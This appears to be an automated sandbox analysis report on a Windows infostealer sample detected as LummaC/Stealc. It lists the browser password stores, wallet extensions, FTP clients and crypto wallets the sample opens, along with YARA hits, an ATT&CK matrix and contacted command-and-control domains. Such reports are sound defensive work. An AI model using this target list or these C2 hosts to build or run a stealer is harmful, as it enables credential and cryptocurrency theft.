                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2437512461.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2462536117.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 0WO49yZcDA.exe PID: 1732, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 0WO49yZcDA.exe PID: 1732, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory751
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager34
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                0WO49yZcDA.exe66%ReversingLabsWin32.Spyware.Stealc
                0WO49yZcDA.exe100%AviraTR/Crypt.XPACK.Gen
                0WO49yZcDA.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                discokeyus.lat
                		104.21.21.99
                		truefalse
                  		high
                  grannyejh.lat
                  		unknown
                  		unknownfalse
                    		high
                    sweepyribs.lat
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      necklacebudi.latfalse
                        		high
                        https://discokeyus.lat/apifalse
                          		high
                          aspecteirs.latfalse
                            		high
                            sweepyribs.latfalse
                              		high
                              sustainskelet.latfalse
                                		high
                                crosshuaht.latfalse
                                  		high
                                  rapeflowwj.latfalse
                                    		high
                                    energyaffai.latfalse
                                      		high
                                      grannyejh.latfalse
                                        		high
                                        discokeyus.latfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtab0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://discokeyus.lat/c0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://discokeyus.lat:443/apial0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://discokeyus.lat:443/apiv6zchhhv.default-release/key4.dbPK0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://grannyejh.lat:443/api0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.c.lencr.org/00WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/00WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://discokeyus.lat/apilv0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://discokeyus.lat/nlTW0WO49yZcDA.exe, 00000000.00000003.2412242953.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2414252491.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.all0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://discokeyus.lat/apiiL0WO49yZcDA.exe, 00000000.00000002.2515911924.00000000060A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://discokeyus.lat/ddryb0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
